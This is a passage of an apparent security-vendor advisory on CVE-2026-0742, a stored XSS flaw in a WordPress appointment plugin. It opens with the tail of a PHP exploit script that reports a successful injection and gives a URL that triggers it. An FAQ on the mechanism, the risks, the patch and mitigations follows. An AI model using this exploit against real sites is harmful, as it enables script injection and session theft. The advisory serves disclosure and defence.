    echo "Payload injected successfully.n";
    echo "Visit {$target_url}/wp-admin/edit.php?post_type=manage_entries to trigger execution.n";
} else {
    echo "Injection failed. Response: " . htmlspecialchars($ajax_response) . "n";
}

curl_close($ch);
unlink('cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-0742?
Overview of the vulnerability
CVE-2026-0742 is a stored cross-site scripting (XSS) vulnerability in the Smart Appointment & Booking plugin for WordPress, affecting versions 1.0.7 and earlier. It allows authenticated attackers with Subscriber-level access or higher to inject arbitrary JavaScript into pages that execute when viewed by other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `saab_save_form_data` AJAX action, where user-supplied data is not properly sanitized or escaped. An attacker can send a POST request with malicious JavaScript payloads, which are stored and later executed when an administrator or user views the affected page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Smart Appointment & Booking plugin version 1.0.7 or earlier is vulnerable. Specifically, authenticated users with Subscriber access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is affected?
Steps to verify vulnerability
To check if your site is affected, verify the version of the Smart Appointment & Booking plugin installed. If it is version 1.0.7 or earlier, your site is vulnerable. Additionally, review your site’s logs for any unauthorized script injections.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is patched in version 1.0.8 of the Smart Appointment & Booking plugin. To mitigate the issue, update the plugin to the latest version immediately. Ensure that you backup your site before performing updates.
What does the CVSS score of 6.4 mean?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it poses a significant risk and should be addressed promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to session hijacking, unauthorized actions within a user’s session, or defacement of the site. Attackers can inject scripts that steal cookies or redirect users to malicious sites.
What security measures were implemented in the patch?
Improvements made in version 1.0.8
The patch for CVE-2026-0742 includes input validation improvements, such as nonce checks and sanitization of user input using `sanitize_text_field`. It also ensures proper output escaping in the admin interface to prevent script execution.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by logging into a WordPress site and sending a crafted request to the vulnerable AJAX endpoint. It shows the steps to inject malicious JavaScript into form data.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling it until a patch can be applied. Additionally, review user roles and limit access to the plugin for lower-privileged users to reduce the risk of exploitation.
Are there any additional resources for understanding XSS vulnerabilities?
Further reading and resources
For more information on XSS vulnerabilities, refer to the OWASP XSS Prevention Cheat Sheet and the CWE-79 documentation. These resources provide guidelines on preventing and mitigating XSS attacks.
What is the difference between stored and reflected XSS?
Types of XSS vulnerabilities
Stored XSS occurs when malicious scripts are stored on the server and executed when users access the affected content, while reflected XSS occurs when scripts are executed immediately from user input without being stored. CVE-2026-0742 is a stored XSS vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations